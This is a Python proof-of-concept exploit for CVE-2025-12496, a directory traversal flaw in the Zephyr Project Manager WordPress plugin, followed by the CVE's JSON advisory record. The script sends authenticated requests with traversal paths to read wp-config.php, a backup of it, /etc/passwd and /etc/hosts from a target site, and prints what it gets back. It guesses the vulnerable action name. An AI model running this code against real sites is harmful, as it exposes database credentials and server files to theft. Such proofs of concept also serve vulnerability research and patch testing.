CVE-2025-12496

import requests import sys # CVE-2025-12496 PoC - Zephyr Project Manager Directory Traversal # Target: WordPress site with Zephyr Project Manager plugin <= 3.3.203 # Authentication: Requires Custom-level access or higher def exploit_directory_traversal(target_url, cookie, file_path='../../../wp-config.php'): """ Exploit directory traversal vulnerability in file parameter """ endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct payload with directory traversal data = { 'action': 'zephyr_get_file', # Likely AJAX action 'file': file_path } headers = { 'Cookie': cookie, 'Content-Type': 'application/x-www-form-urlencoded' } try: response = requests.post(endpoint, data=data, headers=headers, timeout=30) if response.status_code == 200: print(f"[+] Successfully retrieved: {file_path}") print(f"[+] Content length: {len(response.text)} bytes") print(f"[+] Content preview:\n{response.text[:500]}") return response.text else: print(f"[-] Request failed with status: {response.status_code}") return None except requests.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == '__main__': if len(sys.argv) < 3: print("Usage: python cve-2025-12496.py <target_url> <cookie>") print("Example: python cve-2025-12496.py http://example.com 'wordpress_logged_in=xxx'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] # Test various sensitive files files = [ '../../../wp-config.php', '../../../wp-config.php.bak', '../../../etc/passwd', '../../../etc/hosts' ] for f in files: print(f"\n[*] Attempting to read: {f}") exploit_directory_traversal(target, cookie, f)

{"cve": {"id": "CVE-2025-12496", "sourceIdentifier": "[email protected]", "published": "2025-12-17T08:15:42.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Zephyr Project Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.203 via the `file` parameter. This makes it possible for authenticated attackers, with Custom-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. On a servers that have `allow_url_fopen` enabled, this issue allows for Server-Side Request Forgery"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Base/AjaxHandler.php#L3506", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/zephyr-project-manager/trunk/includes/Core/Projects.php#L1870", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2b4b0640-d61a-4969-a5c0-d2d709fb56d0?source=cve", "source": "[email protected]"}]}}